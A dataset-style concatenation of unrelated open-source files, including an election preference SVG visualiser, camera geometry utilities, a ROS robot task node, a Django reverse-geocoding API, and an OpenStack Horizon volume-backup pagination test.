(xq, yq) = p2c(xb, yb, A)
return f"M {xp:g} {yp:g} {xq:g} {yq:g}"
def draw_lines(A: argparse.Namespace) -> str:
"""Draw change-of-winner lines."""
# There are at least 8 points to draw lines between.
# Firstly, a line #1-#2-#3
# 1. Green vs Red on Y axis
(x1, y1) = (A.start, (0.5 - (A.start * A.blue_to_green)))
# 2. Green vs Rd midpoint. Controlled by ex-Blue split
# At max Greens-Red preferencing, it varies from
# (0.25, 0.5) at full Blue-to-Red
# degenerates at equal split (to terpoint)
# (0.25, 0.25) at full Blue-to-Green
# there's a line coming out of the terpoint that (at least for normal values)
# marks out the "Greens 3CP >= Labor 3CP == Liberal 3CP"
# 1 - (g+b) = b
# and another coming in from #1 that A.marks the Labor-Greens 2CP boundary
# g + (b * A.blue_to_green) = 0.5
# This point is where those lines cross: we have Greens 3CP >= Labor 3CP == Liberal 3CP
# g = 0.5 - (b * A.blue_to_green)
# b = 1 - ((0.5 - (b * A.blue_to_green)) + b)
# b = 0.5 + (b * A.blue_to_green) - b
# 2b = 0.5 + (b * A.blue_to_green)
# b (2 - A.blue_to_green) = 0.5
# b = 0.5 / (2 - A.blue_to_green)
b = 0.5 / (2 - A.blue_to_green)
g = 0.5 - (b * A.blue_to_green)
# if A.blue_to_red is less than half, then #2 sits on the b = g line instead
# (the gradient of the #1-#2 line is still correct)
if A.blue_to_red <= 0.5:
# g = 0.5 - (b * A.blue_to_green)
# g = 0.5 - (g * A.blue_to_green)
# g (1 + A.blue_to_green) = 0.5
g = 0.5 / (1 + A.blue_to_green)
b = g
(x2, y2) = (b, g)
# 3. the (1/3, 1/3) point ("terpoint")
# Always some sort of boundary
(x3, y3) = (1.0/3.0, 1.0/3.0)
# Line #1-#2-#3 represents the Red/Green boundary
red_green = f'{line(x1, y1, x2, y2, A)} {line(x2, y2, x3, y3, A)}'
# 4. Red vs Blue midpoint. Basically the inverse of #2, parameterised by ex-Green split
# same as above except swap b and g and use GREEN_TO_*
g = 0.5 / (2 - A.green_to_blue)
b = 0.5 - (g * A.green_to_blue)
if A.green_to_red <= 0.5:
b = 0.5 / (1 + A.green_to_blue)
g = b
(x4, y4) = (b, g)
# 5. Red vs Blue on X axis
(x5, y5) = (0.5 - A.start * A.green_to_blue, A.start)
# Lines #3 - #4 - #5 represents the Red/Blue boundary
red_blue = f'{line(x3, y3, x4, y4, A)} {line(x4, y4, x5, y5, A)}'
# 6. Blue vs Green point. This is controlled by Red's Blue/Green split
# there's one line coming "out" of the terpoint #3
# (it's NW if red favours blue, SE if red favours green)
# and one out of the hapoint #7 (the Red-comes-third line)
# (mostly W if red favours blue, mostly S if red favours green)
# This point occurs where these two lines cross
# (if red favours blue, then red and blue will be equal here)
# (if red favours green, then red and green will be equal here)
# degenerates to terpoint if equal ex-Red split
# terpoint degeneration (A.red_to_blue == 0.5)
b = 1.0/3.0
g = 1.0/3.0
if A.red_to_green == 0.0:
b = 0.25
g = 0.5
elif A.red_to_blue == 0.0:
b = 0.5
g = 0.25
elif A.red_to_blue < 0.5:
# red's coming third and favouring green
# we follow the b >= (r == g) line out of the terpoint
# (1 - (b+g)) == g
# 1 - b = 2g
# g = (1 - b)/2
# we also follow the green == blue 2CP from the hapoint
# b + r * A.red_to_blue == g + r - r * A.red_to_blue == 0.5
# b + r * A.red_to_blue = 0.5
# b + (1 - (b+g))*A.red_to_blue = 0.5
# b + (1 - (b + ((1-b)/2))) * A.red_to_blue = 0.5
# b + (1 - (b + 0.5 - 0.5b)) * A.red_to_blue = 0.5
# b + (1 - (b + 1)/2) * A.red_to_blue = 0.5
# b + ((1 - b) * A.red_to_blue / 2) = 0.5
# b - b*A.red_to_blue/2 + A.red_to_blue/2 = 0.5
# 2b - b*A.red_to_blue + A.red_to_blue = 1
# b * (2 - A.red_to_blue) + A.red_to_blue = 1
# b = A.red_to_green / (2 - A.red_to_blue)
b = A.red_to_green / (2 - A.red_to_blue)
g = (1 - b)/2
elif A.red_to_blue > 0.5:
# transpose of the < 0.5 case...
g = A.red_to_blue / (2 - A.red_to_green)
b = (1 - g)/2
(x6, y6) = (b, g)
# 7. Green vs Blue on 45 (hapoint)
# Also always some sort of boundary
(x7, y7) = (0.5, 0.5)
# Lines #3 - #6 - #7 represents the Blue/Green boundary
blue_green = f'{line(x3, y3, x6, y6, A)} {line(x6, y6, x7, y7, A)}'
# Unconditionally we also have a line down y = 1 - x
# (this passes through the hapoint too, but no direction change)
(xtop, ytop) = p2c(1.0 - A.stop, A.stop, A)
(xright, yright) = p2c(A.stop, 1.0 - A.stop, A)
top_right = f'M {xtop:g} {ytop:g} {xright:g} {yright:g}'
# OK, time to draw all the lines!
return f'\r\n<path d="{red_green} {red_blue} {blue_green} {top_right}" class="line" />\r\n'
def draw_pois(A: argparse.Namespace) -> str:
"""Draw points of interest, as appearing in the specified CSV file"""
out = ""
import csv
rdr = csv.reader(sys.stdin if A.input == "-" else open(A.input, 'r'))
for row in rdr:
try:
r0 = float(row[0])
r1 = float(row[1])
if r0 + r1 > 1.0:
raise ValueError("sum of X and Y columns must be <= 1")
r2 = row[2] if len(row) > 2 else ""
(x, y) = p2c(r0, r1, A)
tooltip = f"{r2}\n{Party.GREEN.value[0]}: {r1:.1%}, {Party.RED.value[0]}: {(1 - (r1+r0)):.1%}, {Party.BLUE.value[0]}: {r0:.1%}.".replace(
".0%", "%")
try:
(winner, margin) = calculate_winner(1 - (r0 + r1), r1, r0, A)
tooltip += f"\nWinner: {winner.value[0]} {margin:.1%}".replace(
".0%", "%")
except TypeError: # ties A.n
tooltip += "\nWinner: TIE"
out += f'<circle cx="{x:g}" cy="{y:g}" r="{A.radius:g}" class="d poi"><title>{tooltip}</title></circle>\r\n'
except (TypeError, IndexError, ValueError) as e:
print("Could not parse input row:", e, file=sys.stderr)
print(row, file=sys.stderr)
return out
def construct_svg(A: argparse.Namespace) -> str:
"""Returns an SVG of the graph for given parameters as specified in `A`."""
# let's output some SVG!
out = ""
out += f'<svg viewBox="0 0 {A.width:.0f} {A.width:.0f}" version="1.1" xmlns="http://www.w3.org/2000/svg">'
# Set up <defs> section, including our triangle marker, the keyline effect and our CSS
css = DEFAULT_CSS
if A.css:
css = (A.css).read()
out += '<defs>' + \
f'<marker id="triangle" viewBox="0 0 10 10" \
refX="1" refY="5" \
markerUnits="strokeWidth" \
markerWidth="{A.scale * 0.5}" markerHeight="{A.scale * 0.5}" \
orient="auto"> \
<path d="M 0 0 L 10 5 L 0 10 z"/> \
</marker>' + \
"""<filter id="keylineEffect" color-interpolation-filters="sRGB">
<feMorphology in="SourceGraphic" result="MORPH" operator="dilate" radius="1.5"/>
<feComponentTransfer result="KEYLINE">
<!-- invert colors -->
<feFuncR type="linear" slope="-1" intercept="1" />
<feFuncG type="linear" slope="-1" intercept="1" />
<feFuncB type="linear" slope="-1" intercept="1" />
</feComponentTransfer>
<feMerge>
<feMergeNode in="KEYLINE"/>
<feMergeNode in="SourceGraphic"/>
</feMerge>
</filter>""" + \
f'<style type="text/css"><![CDATA[ \
{css} \
]]> \
</style>' + \
'</defs>'
# place a bg rect
out += f'<rect width="{A.width:.0f}" height="{A.width:.0f}" class="bg" />'
# place our dots
for b in frange(A.start, (A.stop + A.step), A.step):
for g in frange(A.start, (A.stop + A.step), A.step):
if g + b > 1.0:
continue
out += construct_dot(b, g, A)
# Draw change-of-winner lines
out += draw_lines(A)
# place points of interest
if A.input:
out += draw_pois(A)
# draw labels saying assumptions?
out += f'<text x="{A.width - A.scale*12:g}" y="{2*A.scale:g}" style="font-size:{A.scale:g}">{Party.RED.value[0]} to {Party.GREEN.value[0]}: {100.0*A.red_to_green:.1f}%</text>'
out += f'<text x="{A.width - A.scale*12:g}" y="{4*A.scale:g}" style="font-size:{A.scale:g}">{Party.GREEN.value[0]} to {Party.RED.value[0]}: {100.0*A.green_to_red:.1f}%</text>'
out += f'<text x="{A.width - A.scale*12:g}" y="{6*A.scale:g}" style="font-size:{A.scale:g}">{Party.BLUE.value[0]} to {Party.RED.value[0]}: {100.0*A.blue_to_red:.1f}%</text>'
(x0, y0) = p2c(A.start, A.start, A)
(x0, y100) = p2c(A.start, A.stop, A)
(x100, y0) = p2c(A.stop, A.start, A)
# Draw Y axis
out += f'<path d="M {x0:g} {A.width:g} V {y100:g}" style="stroke: #222; stroke-width: {A.scale * 0.2:g}px" marker-end="url(#triangle)"/>'
out += f'<text transform="translate({(x0 - (A.offset - 1)*A.scale):g}, {A.width/2 :g}) rotate(270)" style="text-anchor:middle">{Party.GREEN.value[0]} 3CP</text>'
for g in A.marks:
if g > A.start and g <= (A.stop):
(xpos, ypos) = p2c(A.start, g, A)
out += f'<path d="M {xpos:g} {ypos:g} h {-A.scale:g}" style="stroke: #222; stroke-width: {A.scale * 0.2:g}px"/>'
out += f'<text y="{(ypos + A.scale/2):g}" x="{(xpos - 3*A.scale):g}" style="font-size:{A.scale:g}; text-anchor:right; text-align:middle">{g:.0%}</text>'
# Draw X axis
out += f'<path d="M {0:g} {y0:g} H {x100:g}" style="stroke: #222; stroke-width: {A.scale * 0.2:g}px" marker-end="url(#triangle)"/>'
out += f'<text x="{A.width/2:g}" y="{y0 + 3.5*A.scale:g}" style="text-anchor:middle">{Party.BLUE.value[0]} 3CP</text>'
for b in A.marks:
if b > A.start and b <= (A.stop):
(xpos, ypos) = p2c(b, A.start, A)
out += f'<path d="M {xpos:g} {ypos:g} v {A.scale:g}" style="stroke: #222; stroke-width: {A.scale * 0.2:g}px"/>'
out += f'<text x="{xpos:g}" y="{ypos + 2*A.scale:g}" style="font-size:{A.scale}; text-anchor:middle">{b:.0%}</text>'
out += "\r\n<!-- Generated by https://abjago.net/3pp/ -->\r\n"
out += "</svg>"
return out
def get_args(args=None) -> argparse.Namespace:
"""pass args='' for defaults, or leave as None for checking argv.
DEFAULT VALUES are set here."""
import argparse
parser = argparse.ArgumentParser(description=f"Three-Candidate-Preferred Visualiser.\
Constructs a 2D graph with {Party.BLUE.value[0]} on the X-axis, \
{Party.GREEN.value[0]} on the Y-axis, and dots shaded by winning party.\
Prints an SVG to standard output and optionally takes a CSV of points of interest.\
N.B. all numeric values should be between zero and one.")
parser.add_argument("--green-to-red", default=0.8, type=float,
help=f"{Party.GREEN.value[0]}-to-{Party.RED.value[0]} preference ratio (default: %(default)g)")
parser.add_argument(f"--red-to-green", default=0.8, type=float,
help=f"{Party.RED.value[0]}-to-{Party.GREEN.value[0]} preference ratio (default: %(default)g)")
parser.add_argument(f"--blue-to-red", default=0.7, type=float,
help=f"{Party.BLUE.value[0]}-to-{Party.RED.value[0]} preference ratio (default: %(default)g)")
parser.add_argument("--start", default=0.2, type=float,
help="minimum X and Y axis value (default: %(default)g)")
parser.add_argument("--stop", default=0.6, type=float,
help="maximum X and Y axis value (default: %(default)g)")
parser.add_argument("--step", default=0.01, type=float,
help="precision of dots (default: %(default)g)")
parser.add_argument('--scale', default=10, type=int,
help="pixels per percent (default: %(default)g)")
parser.add_argument('--offset', default=5, type=int,
help="multiple of scale factor to A.offset axis by (default: %(default)g)")
parser.add_argument("--marks", nargs='+', default=[i/10.0 for i in range(0, 10)], metavar="MARK", type=float,
help="place axis marks at these values (default: every 10%%)")
parser.add_argument("--css", metavar='FILE',
type=argparse.FileType('r'), help="Use CSS from specified file")
parser.add_argument(
"--input", "-i", help="input CSV of points of interest (format: x, y, label) (pass - for standard input)")
parser.add_argument("--output", "-o", type=argparse.FileType('w'),
default=sys.stdout, help="output SVG (default: standard output)")
return (parser.parse_args(args))
def validate_args(A: argparse.Namespace) -> argparse.Namespace:
# Clamp A.step to be in a reasonable range
A.step = max(min(abs(A.step), 0.05), 0.002)
# clamp A.start to be a usable range
A.start = max(min(abs(A.start), 0.5 - 10*A.step), 0.0)
# If (1 - A.stop) < A.start the graph gets wonky
A.stop = min(abs(A.stop), 1 - A.start)
# Calculate sizes...
A.inner_width = A.scale * 100.0 * (A.stop - A.start)
A.width = (A.offset + 1) * A.scale + \
A.inner_width # extra on right and top
# A.scale is pixels per percent, A.step is percent per dot
A.radius = 50.0 * A.scale * A.step
# Clamp our preference flows...
A.green_to_red = max(min(abs(A.green_to_red), 1.0), 0.0)
A.red_to_green = max(min(abs(A.red_to_green), 1.0), 0.0)
A.blue_to_red = max(min(abs(A.blue_to_red), 1.0), 0.0)
# Infer the inverse flows...
A.green_to_blue = 1.0 - A.green_to_red
A.red_to_blue = 1.0 - A.red_to_green
A.blue_to_green = 1.0 - A.blue_to_red
return A
# the main show!
if __name__ == "__main__":
try:
A = validate_args(get_args())
# print(A, file=sys.stderr)
print(construct_svg(A), file=A.output)
except ValueError as e:
print(e, file=sys.stderr)
| alexjago/3pp-visualiser | visualise_cpv.py | visualise_cpv.py | py | 22,052 | python | en | code | 0 | github-code | 36 |
12152753848 | import numpy as np
import plotly
import plotly.graph_objects as go
def normalize_cam_points(P,x,N):
"""
Normalize the camera matrices and the image points with normalization matrices N.
:param P: ndarray of shape [n_cam, 3, 4], the cameras
:param x: ndarray of shape [n_cam, 3, n_points], the projected image points
:param N: ndarray of shape [n_cam, 3, 3], the normalization matrices
:return: norm_P: ndarray of shape [n_cam, 3, 4], the normalized cameras
norm_x: ndarray of shape [n_cam, 4, n_points], the normalized image points
"""
assert x.shape[1] == 3, "x must be in homographic coordinates"
norm_P = N @ P
norm_x = N @ x
return norm_P, norm_x
def reprojection_errors(P, X, x, visible_points):
"""
Projects the 3D points in X to the cameras P and computes the distance to the real image points x.
:param P: ndarray of shape [n_cam, 3, 4], the cameras
:param X: ndarray of shape [4, n_points], the predicted 3D points
:param x: ndarray of shape [n_cam, 3, n_points], the projected image points
:param visible_points: boolean matrix of shape [n_cam, n_points], what cameras see what points
:return: errors: ndarray of shape [n_cam, n_points], in the ij entry has ||x_ij - pflat(P_i*X_j)||.
The errors in the non-visible entries should be np.nan
"""
assert x.shape[1] == 3, "x must be in homographic coordinates"
proj = P @ X
proj = proj / proj[:,[-1],:]
errors = np.linalg.norm(proj - x, axis=1)
visible_errors = np.where(visible_points, errors, np.nan)
return visible_errors
def decompose_camera_matrix(P, K):
"""
Decompose camera matrices to R and t s.t P[i] = K*R^T[I -t]
:param P: ndarray of shape [n_cam, 3, 4], the cameras
:param K: ndarray of shape [n_cam, 3, 3], the calibration matrices
:return: R: ndarray of shape [n_cam, 3, 3]
t: ndarray of shape [n_cam, 3]
"""
Rt = np.linalg.inv(K) @ P
Rs = np.transpose(Rt[:, :, :3],(0,2,1))
ts = np.squeeze(-Rs @ np.expand_dims(Rt[:, 0:3, 3], axis=-1))
return Rs, ts
def pflat(x):
return x/x[-1]
def plot_cameras(P, K, X, title='reconstruction'):
"""
Plot a 3D image of the points and cameras
:param P: ndarray of shape [n_cam, 3, 4], the cameras
:param K: ndarray of shape [n_cam, 3, 3], the calibration matrices
:param X: ndarray of shape [4, n_points], the predicted 3D points
:param title: the name of the plot
"""
R,t = decompose_camera_matrix(P, K)
data = []
data.append(get_3D_quiver_trace(t, R[:, :3, 2], color='#86CE00', name='cam_learn'))
data.append(get_3D_scater_trace(t.T, color='#86CE00', name='cam_learn', size=1))
data.append(get_3D_scater_trace(X[:3,:], '#3366CC', '3D points', size=0.5))
fig = go.Figure(data=data)
path = title+'.html'
plotly.offline.plot(fig, filename=path, auto_open=False)
def get_3D_quiver_trace(points, directions, color='#bd1540', name=''):
assert points.shape[1] == 3, "3d cone plot input points are not correctely shaped "
assert len(points.shape) == 2, "3d cone plot input points are not correctely shaped "
assert directions.shape[1] == 3, "3d cone plot input directions are not correctely shaped "
assert len(directions.shape) == 2, "3d cone plot input directions are not correctely shaped "
trace = go.Cone(
name=name,
x=points[:, 0],
y=points[:, 1],
z=points[:, 2],
u=directions[:, 0],
v=directions[:, 1],
w=directions[:, 2],
sizemode='absolute',
sizeref=0.5,
showscale=False,
colorscale=[[0, color], [1, color]],
anchor="tail"
)
return trace
def get_3D_scater_trace(points, color, name,size=0.5):
assert points.shape[0] == 3, "3d plot input points are not correctely shaped "
assert len(points.shape) == 2, "3d plot input points are not correctely shaped "
trace = go.Scatter3d(
name=name,
x=points[0, :],
y=points[1, :],
z=points[2, :],
mode='markers',
marker=dict(
size=size,
color=color,
)
)
return trace
| antebi-itai/Weizmann | Multiple View Geometry/Assignment 5/Solution/code/utils.py | utils.py | py | 4,188 | python | en | code | 0 | github-code | 36 |
40343025798 | import rospy
import bmw_wrap as bw
import time as tm
# System's states definitions
IDLE = 0
MAPPING = 1
ESCAPING = 2
# Classes definitions
class Task:
"""
This class keeps the task's desc. info.
"""
name = None
ID = None
def __init__(self, task_id):
self.name = task_desc[task_id]
self.ID = task_id
class Master():
"""
This class contains all the master's node
methods and attrivutes.
"""
"""
The distance value read from the
ultrasonic sensor.
"""
distance = None
"""
The distance value read from the
ultrasonic sensor.
"""
voltage = None
"""
The distance value read from the
ultrasonic sensor.
"""
left_sensor_value = None
"""
Right light sensor value read.
"""
right_sensor_value = None
"""
Left light sensor value read.
"""
left_sensor_string = None
"""
Right light sensor string read.
"""
right_sensor_string = None
"""
Left light sensor string read.
"""
mapping_flag = None
"""
Flag that indicates when the mapping
process is done.
"""
mapping_done = None
"""
List that contains the path to be
followed.
"""
path = None
"""
List that contains the tasks to
to be executed by the system.
"""
tasks_pile = None
def __init__(self):
self.tasks_pile = []
self.add_task(Task(IDLE))
self.mapping_flag = False
self.mapping_done = False
self.path = []
def add_task(self, task):
"""
This function adds a new task to the
pile.
"""
self.tasks_pile.append(task)
def remove_task(self, task_index):
"""
This function removes the last task
on the pile.
"""
if len(self.tasks_pile)> 1:
self.tasks_pile.pop(task_index)
def get_current_task(self):
"""
This function gets the task that is
currently being executed.
"""
return self.tasks_pile[-1]
def task_assigner(self):
"""
This function checks the system's status
and adds tasks depending.
"""
current_task = self.get_current_task()
# First checks if mapping flag is up
if (self.mapping_flag == True and
current_task.ID == IDLE):
# Adds mapping routine to tasks pile
self.add_task(Task(MAPPING))
# Then cheks if mapping is done
elif (self.mapping_done == True and
current_task.ID == IDLE):
# Adds escaping routine
self.add_task(Task(ESCAPING))
# Iddle mode
else:
pass
def task_solver(self):
"""
This function executes the current task,
which is the task on the pile's top.
"""
# Get current task
current_task = self.get_current_task()
# Depending on the current task, execute diferent commands.
if current_task.ID == IDLE:
# Make led 1 blink, indicating idle state.
bw.board.Set_Led(1,1)
tm.sleep(0.4)
bw.board.Set_Led(1,0)
tm.sleep(0.4)
print('idle')
elif current_task.ID == MAPPING:
# Make led 2 blink, idicating mapping state.
bw.board.Set_Led(2,1)
# Call line following routine
self.line_following(
self.left_sensor_string,
self.right_sensor_string)
bw.board.Set_Led(2,0)
elif current_task.ID == ESCAPPING:
# Make led 3 blink, idicating escaping state.
bw.board.Set_Led(3,1)
# Call line following routine
self.line_following(
self.left_sensor_string,
self.right_sensor_string)
bw.board.Set_Led(3,0)
def run(self):
"""
This function executes the task solver and
assigner.
"""
self.task_assigner()
self.task_solver()
def line_following(self,
left_sensor,
right_sensor):
"""
This function takes care of the line following
and turns execution.
"""
# Same color read case
if left_sensor == right_sensor:
color = left_sensor
# Line centered case
if color == 'white':
bw.set_motors_speeds(-100,100)
# Intsersection case
elif color == 'black':
# Execute path instruction
if len(self.path)>0:
execute_move(self.path[0])
# Path empty, finished trajectory
else:
self.mapping_done = False
else:
# Car loaded to left side
if left_sensor == 'white' :
# Move to left
bw.set_motors_speeds(-100,65)
# Car loaded to right side
elif right_sensor == 'white':
# Move to left
bw.set_motors_speeds(-65,100)
| Conilo/BMW-Challenge | src/nodes/Master/master_module.py | master_module.py | py | 5,403 | python | en | code | 0 | github-code | 36 |
15646167981 | import os
import glob
import numpy as np
def uniform_ball(n_points, rad=1.0):
angle1 = np.random.uniform(-1, 1, n_points)
angle2 = np.random.uniform(0, 1, n_points)
radius = np.random.uniform(0, rad, n_points)
r = radius ** (1/3)
theta = np.arccos(angle1) #np.pi * angle1
phi = 2 * np.pi * angle2
x = r * np.sin(theta) * np.cos(phi)
y = r * np.sin(theta) * np.sin(phi)
z = r * np.cos(theta)
return np.stack([x, y, z], axis=-1)
| SimonGiebenhain/NPHM | src/NPHM/data/utils.py | utils.py | py | 472 | python | en | code | 117 | github-code | 36 |
25730149556 | # -*- coding: utf-8 -*-
from django.shortcuts import render
import psycopg2
import psycopg2.extras
import json
from django.http import HttpResponse
from django.http import HttpResponseServerError
from django.http import HttpResponseBadRequest
from .dicttoxml import DictToXML
def index(request):
# Try to connect
try:
conn = psycopg2.connect(
database="gis"
)
cursor = conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
cursor.execute("SELECT date FROM bev_date;")
sql_result = cursor.fetchall()
date = sql_result[0]['date'].strftime('%d.%m.%Y')
except Exception as e:
result = {
"status": "server_error",
"message": "The web application was unable to connect to the database. Please inform the site " +
"administrator about this issue."
}
return HttpResponseServerError(json.dumps(result), content_type="application/json")
return render(request, context={'date': date}, template_name='index.html')
def is_float(value):
try:
float(value)
return True
except ValueError:
return False
def reverse_geocode(request, format):
default_distance = 30
max_distance = 100
default_limit = 5
max_limit = 10
# Get the HTTP GET parameters and use default values where it makes sense.
lat = request.GET.get("lat")
lon = request.GET.get("lon")
epsg = request.GET.get("epsg", "4326")
distance = request.GET.get("distance", default_distance)
limit = request.GET.get('limit', default_limit)
# Try to connect
try:
conn = psycopg2.connect(
database="gis"
)
except Exception as e:
result = {
"status": "server_error",
"message": "The web application was unable to connect to the database. Please inform the site " +
"administrator about this issue."
}
return HttpResponseServerError(json.dumps(result), content_type="application/json")
cursor = conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
# Do basic data validation.
if not format in ["json", "xml"]:
result = {
"status": "bad_request",
"message": "The format must either by JSON or XML."
}
return HttpResponseBadRequest(get_response_content(result, format), content_type=get_content_type(format))
if not epsg.isdigit():
result = {
"status": "bad_request",
"message": "The EPSG parameter must be an integer vaule."
}
return HttpResponseBadRequest(get_response_content(result, format), content_type=get_content_type(format))
epsg = int(epsg)
epsg_statement = "SELECT srid from spatial_ref_sys WHERE srid=%s"
cursor.execute(epsg_statement, (epsg,))
epsg_result = cursor.fetchall()
if len(epsg_result) < 1:
result = {
"status": "bad_request",
"message": "EPSG %s is not supported or does not exist. Try 4326!" % epsg
}
return HttpResponseBadRequest(get_response_content(result, format), content_type=get_content_type(format))
if not distance.isdigit() or (int(distance) > max_distance) or (int(distance) < 0):
result = {
"status": "bad_request",
"message": "The distance value must be an integer between 0 and %s." % max_distance
}
return HttpResponseBadRequest(get_response_content(result, format), content_type=get_content_type(format))
if not limit.isdigit() or (int(limit) > max_limit) or (int(limit) < 1):
result = {
"status": "bad_request",
"message": "The limit parameter must be an integer between 1 and %s." % max_limit
}
return HttpResponseBadRequest(get_response_content(result, format), content_type=get_content_type(format))
# Get the data release date and format it.
try:
cursor.execute("SELECT date FROM bev_date;")
sql_result = cursor.fetchall()
date = sql_result[0]['date']
except Exception as e:
result = {
"status": "server_error",
"message": "Could not get the release date of the BEV data."
}
return HttpResponseServerError(get_response_content(result, format), content_type=get_content_type(format))
statement = """
select b.municipality, b.locality, b.postcode, b.street, b.house_number, b.house_name, b.address_type,
ST_Distance(ST_SetSRID(ST_MakePoint(%s, %s),%s), b.point) as distance,
ST_X(ST_Transform(point::geometry, %s)) as lon, ST_Y(ST_Transform(point::geometry, %s)) as lat,
municipality_has_ambiguous_addresses
from bev_addresses b
where ST_DWithin(ST_SetSRID(ST_MakePoint(%s, %s),%s), b.point, %s)
order by distance
limit %s
"""
try:
cursor.execute(statement, (lon, lat, epsg, epsg, epsg, lon, lat, epsg, distance, limit,))
sql_result = cursor.fetchall()
# Convert the result from psycopg2.extras.RealDictRow back to a usual dict.
dict_result = []
for row in sql_result:
dict_result.append(dict(row))
except Exception as e:
result = {
"status": "server_error",
"message": "There was a problem querying the database. Please verify that the parameters you submitted " +
"(especially the coordinates according to the EPSG you specified) make sense."
}
return HttpResponseServerError(get_response_content(result, format), content_type=get_content_type(format))
result = {"status": "ok",
"copyright": u"© Österreichisches Adressregister 2017, N 23806/2017 (Stichtagsdaten vom %s)" % (
date.strftime('%d.%m.%Y')), "address_date": date.strftime('%Y-%m-%d'), "results": dict_result}
return HttpResponse(get_response_content(result, format), content_type=get_content_type(format))
def get_response_content(dictionary, format):
if format == 'json':
return json.dumps(dictionary)
elif format == 'xml':
xml = DictToXML({"reverse_geocode_results": dictionary}, list_mappings={"results": "address"})
return xml.get_string()
return ""
def get_content_type(format):
if format == 'json':
return "application/json"
elif format == 'xml':
return "application/xml"
return "text/plain"
| thomaskonrad/bev-reverse-geocoder | bev_reverse_geocoder_api/views.py | views.py | py | 6,488 | python | en | code | 3 | github-code | 36 |
14551208863 | from fractions import Fraction
from hypothesis import given
from jubeatools import song
from jubeatools.formats.timemap import TimeMap
from jubeatools.testutils import strategies as jbst
from jubeatools.utils import group_by
@given(jbst.timing_info(with_bpm_changes=True), jbst.beat_time())
def test_that_seconds_at_beat_works_like_the_naive_approach(
timing: song.Timing, beat: song.BeatsTime
) -> None:
time_map = TimeMap.from_timing(timing)
expected = naive_approach(timing, beat)
actual = time_map.fractional_seconds_at(beat)
assert actual == expected
def naive_approach(beats: song.Timing, beat: song.BeatsTime) -> Fraction:
if beat < 0:
raise ValueError("Can't compute seconds at negative beat")
if not beats.events:
raise ValueError("No BPM defined")
grouped_by_time = group_by(beats.events, key=lambda e: e.time)
for time, events in grouped_by_time.items():
if len(events) > 1:
raise ValueError(f"Multiple BPMs defined on beat {time} : {events}")
sorted_events = sorted(beats.events, key=lambda e: e.time)
first_event = sorted_events[0]
if first_event.time != song.BeatsTime(0):
raise ValueError("First BPM event is not on beat zero")
if beat > sorted_events[-1].time:
events_before = sorted_events
else:
last_index = next(i for i, e in enumerate(sorted_events) if e.time >= beat)
events_before = sorted_events[:last_index]
total_seconds = Fraction(0)
current_beat = beat
for event in reversed(events_before):
beats_since_previous = current_beat - event.time
seconds_since_previous = (60 * beats_since_previous) / Fraction(event.BPM)
total_seconds += seconds_since_previous
current_beat = event.time
total_seconds = total_seconds + Fraction(beats.beat_zero_offset)
return total_seconds
| Stepland/jubeatools | jubeatools/formats/konami/eve/tests/test_timemap.py | test_timemap.py | py | 1,881 | python | en | code | 4 | github-code | 36 |
7350065420 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack_dashboard.test.integration_tests import helpers
from openstack_dashboard.test.integration_tests.regions import messages
class TestVolumeBackups(helpers.TestCase):
"""Login as demo user"""
VOLUME_NAME = helpers.gen_random_resource_name("volume")
VOLUME_BACKUP_NAME = helpers.gen_random_resource_name("volume_backup")
def setUp(self):
super(TestVolumeBackups, self).setUp()
volumes_page = self.home_pg.go_to_compute_volumes_volumespage()
volumes_page.create_volume(self.VOLUME_NAME)
volumes_page.find_message_and_dismiss(messages.INFO)
self.assertTrue(volumes_page.is_volume_status(self.VOLUME_NAME,
'Available'))
def cleanup():
volumes_page = self.home_pg.go_to_compute_volumes_volumespage()
volumes_page.delete_volume(self.VOLUME_NAME)
volumes_page.find_message_and_dismiss(messages.SUCCESS)
self.assertTrue(volumes_page.is_volume_deleted(self.VOLUME_NAME))
self.addCleanup(cleanup)
def test_volume_backups_pagination(self):
"""This test checks volumes backups pagination
Steps:
1) Login to Horizon Dashboard
2) Go to Project -> Compute -> Volumes -> Volumes tab, create
volumes and 3 backups
3) Navigate to user settings page
4) Change 'Items Per Page' value to 1
5) Go to Project -> Compute -> Volumes -> Volumes Snapshot tab
or Admin -> System -> Volumes -> Volumes Snapshot tab
(depends on user)
6) Check that only 'Next' link is available, only one backup is
available (and it has correct name)
7) Click 'Next' and check that both 'Prev' and 'Next' links are
available, only one backup is available (and it has correct name)
8) Click 'Next' and check that only 'Prev' link is available,
only one backup is visible (and it has correct name)
9) Click 'Prev' and check result (should be the same as for step7)
10) Click 'Prev' and check result (should be the same as for step6)
11) Go to user settings page and restore 'Items Per Page'
12) Delete created backups and volumes
"""
volumes_page = self.home_pg.go_to_compute_volumes_volumespage()
count = 3
items_per_page = 1
backup_names = ["{0}_{1}".format(self.VOLUME_BACKUP_NAME, i) for i
in range(count)]
for i, name in enumerate(backup_names):
volumes_backup_page = volumes_page.create_volume_backup(
self.VOLUME_NAME, name)
volumes_page.find_message_and_dismiss(messages.INFO)
self.assertTrue(
volumes_backup_page.is_volume_backup_available(name))
if i < count - 1:
volumes_backup_page.switch_to_volumes_tab()
first_page_definition = {'Next': True, 'Prev': False,
'Count': items_per_page,
'Names': [backup_names[2]]}
second_page_definition = {'Next': True, 'Prev': True,
'Count': items_per_page,
'Names': [backup_names[1]]}
third_page_definition = {'Next': False, 'Prev': True,
'Count': items_per_page,
'Names': [backup_names[0]]}
settings_page = self.home_pg.go_to_settings_usersettingspage()
settings_page.change_pagesize(items_per_page)
settings_page.find_message_and_dismiss(messages.SUCCESS)
volumes_backup_page = self.home_pg \
.go_to_compute_volumes_volumebackupspage()
volumes_backup_page.volumebackups_table.assert_definition(
first_page_definition)
volumes_backup_page.volumebackups_table.turn_next_page()
volumes_backup_page.volumebackups_table.assert_definition(
second_page_definition)
volumes_backup_page.volumebackups_table.turn_next_page()
volumes_backup_page.volumebackups_table.assert_definition(
third_page_definition)
volumes_backup_page.volumebackups_table.turn_prev_page()
volumes_backup_page.volumebackups_table.assert_definition(
second_page_definition)
volumes_backup_page.volumebackups_table.turn_prev_page()
volumes_backup_page.volumebackups_table.assert_definition(
first_page_definition)
